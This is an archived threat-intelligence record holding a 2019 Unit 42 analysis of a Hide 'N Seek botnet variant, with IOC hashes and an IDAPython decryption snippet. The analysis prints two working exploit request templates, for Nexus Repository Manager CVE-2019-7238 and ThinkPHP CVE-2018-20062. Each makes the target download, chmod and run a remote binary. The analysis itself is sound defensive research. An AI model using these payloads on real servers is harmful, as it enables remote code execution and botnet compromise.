{
	"id": "a717e01d-6019-4a8a-954b-5633535ef1fe",
	"created_at": "2026-04-06T00:14:15.919838Z",
	"updated_at": "2026-04-10T03:20:41.885368Z",
	"deleted_at": null,
	"sha1_hash": "89dc48767f8ea1c868b63116ab337d1681f5e1a3",
	"title": "Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager \u0026 ThinkPHP",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 60717,
	"plain_text": "Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager \u0026 ThinkPHP\r\nBy Ruchna Nigam\r\nPublished: 2019-06-12 · Archived: 2026-04-05 19:15:06 UTC\r\nExecutive Summary\r\nThe Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer\r\ncommunication between bots.\r\nSince its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new\r\nexploits, to targeting Android devices via the Android Debug Bridge (ADB).\r\nThis post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits:\r\nCVE-2018-20062, which targets ThinkPHP installations, and CVE-2019-7238, a Remote Code Execution (RCE)\r\nvulnerability in Sonatype Nexus Repository Manager (NXRM) 3 software installations.\r\nWhile the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of\r\nthe CVE-2019-7238 vulnerability being exploited in the wild has been by the DDG botnet. Our research, outlined\r\nbelow, shows that the Hide 'N Seek botnet incorporated this exploit back in February 2019, even before the DDG\r\nbotnet.\r\nTechnical Analysis\r\nThis newest version of the Hide 'N Seek malware incorporates many of the previously seen features of the\r\nmalware family, including persistence, the incorporation of exploits, and targeting Android devices via ADB.\r\nIn addition to exploits previously used by the malware family, this particular version is unique for its use of the\r\nfollowing two new exploits:\r\nCVE-2019-7238, which is an RCE vulnerability in Sonatype Nexus Repository Manager installations prior\r\nto version 3.15.0. While Proof of Concept (PoC) code for this vulnerability has been publicly available\r\nsince a few weeks after its public disclosure, the only other instance of it being exploited in the wild has\r\nbeen by the DDG botnet in May 2019. 
Our research has shown, based on the first seen date for samples of\r\nthis new Hide 'N Seek version, that the first demonstrated exploitation in the wild was actually February\r\n2019, a full month prior to the DDG botnet. The exploit format is shown below:\r\nPOST /service/extdirect HTTP/1.1\r\nHost: %J\r\nAccept: */*\r\nContent-Type: application/json\r\nConnection: close\r\nContent-Length: %d\r\n\r\n{\"action\":\"coreui_Component\",\"method\":\"previewAssets\",\"data\":[{\"page\":1,\"start\":0,\"limit\":50,\"sort\":[{\"property\":\"name\",\"direction\":\"ASC\"}],\"filter\":[{\"property\":\"repositoryName\",\"value\":\"*\"},{\"property\":\"expression\",\"value\":\"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-w','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)\u0026\u0026chmod 777 %N\u0026\u0026./%N a%J a%J',27h,'])\"},{\"property\":\"type\",\"value\":\"jexl\"}]}],\"type\":\"rpc\",\"tid\":8}\r\nCVE-2018-20062 is an RCE vulnerability in ThinkPHP. 
This exploit has frequently been used by Mirai\r\nvariants in the wild since its public disclosure; however, this is the first observed use of it by Hide 'N Seek.\r\nThe exploit format is shown below:\r\nGET /?s=/index/thinkapp/invokefunction\u0026function=call_user_func_array\u0026vars[0]=system\u0026vars[1][]=(wget%20http://%J/%T%20-O%20%N||/bin/busybox%20tftp%20-g%20-l%20%N%20-r%20%T%20%I);chmod%20777%20%N;./%N%20a%J%20a%J HTTP/1.1\r\nHost: %J\r\nIn addition, this Hide 'N Seek variant also exploits the following vulnerabilities, which it has used in the past:\r\nCVE-2018-7297: an RCE vulnerability in the HomeMatic Zentrale CCU2\r\nCouchDB RCE\r\nOrientDB RCE\r\nNetgear DGN1000 setup.cgi RCE\r\nAVTECH IP Camera/NVR/DVR RCE\r\nTP-Link Routers backdoor\r\nIn addition to the two new exploits, this new variant also uses an XOR key of 0x87 for string encryption, which is\r\ndifferent from previously seen variants. However, the encryption scheme used is the same as has been used by the\r\nmalware family so far, i.e. a cumulative byte-wise XOR. This is better explained by the IDAPython code snippet\r\nbelow:\r\nkey = 0x87  # initial XOR key for this variant\r\nfor addr in range(strstart, strend):\r\n    originalbyte = GetOriginalByte(addr)\r\n    decryptedbyte = originalbyte ^ (key \u0026 0xff)  # only the low byte of the running key is used\r\n    PatchByte(addr, decryptedbyte)\r\n    key += decryptedbyte  # the key accumulates every decrypted byte, hence \"cumulative\" XOR\r\nAs seen in previous samples, this malware family contains a list of hard-coded peers for P2P communication. The\r\nlist of hard-coded peers in this new variant differs from samples seen in the past. The hard-coded peer IPs and\r\nports in these samples can be found on our GitHub page here.\r\nConclusion\r\nSince its discovery, the Hide 'N Seek P2P Linux botnet has evolved to incorporate several new exploits to widen\r\nthe range of devices it can infect. 
In this instance, the newly discovered variant added two recent vulnerabilities to\r\nits arsenal. In particular, it added an exploit targeting CVE-2019-7238, which, based on the dates of appearance of\r\nsamples, makes this the earliest exploitation of the vulnerability in the wild.\r\nPalo Alto Networks customers are protected by:\r\nWildFire, which detects all related samples with malicious verdicts.\r\nThreat Prevention, which blocks all exploits used by this variant.\r\nThe malware family can be tracked in AutoFocus using the tag HideNSeek.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nFirst Seen | SHA256 | Targeted Architecture\r\n2019-02-21 | 49495c9aa08d7859fec1f99f487560b59d8a8914811746181e4e7edbee85341f | x86 64-bit\r\n2019-02-21 | d068e8f781879774f0bcc1f2a116211d41194b67024fe45966c8272a8038a7a1 | ARM\r\n2019-03-15 | 1583fd1c6607b77f51411c4ad7c9225324fd1b069645062a348cd885de0ac382 | ARM\r\n2019-03-15 | 7e20c6cea88ade6a6c4a08ce48fe4ac2451069b7662a8dda4362a304b4854ec7 | ARM\r\n2019-03-20 | 0b05202f4da9bbe1af1811707a76544453282c4f3c0ac9b353759c86742f4369 | MIPS big endian\r\n2019-03-22 | 73df4e952c581afc427fa18fa2d0bcfa409c1814cd872a3ccf05d44f934ce780 | MIPS little endian\r\n2019-05-24 | c082c39e595c7f23c04ce0d6597657d6e649585d5da49b5bd896e664b712e60d | MIPS big endian\r\n2019-05-26 | 500dd4c1a5c24495c3bb8173ce5c7b15ba3344aef855090b9b9585b2bfeea974 | x86\r\nTable 1. 
Sample IOCs for new Hide ‘N Seek variant\r\nSource: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/"
	],
	"report_names": [
		"hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775791241,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89dc48767f8ea1c868b63116ab337d1681f5e1a3.pdf",
		"text": "https://archive.orkl.eu/89dc48767f8ea1c868b63116ab337d1681f5e1a3.txt",
		"img": "https://archive.orkl.eu/89dc48767f8ea1c868b63116ab337d1681f5e1a3.jpg"
	}
}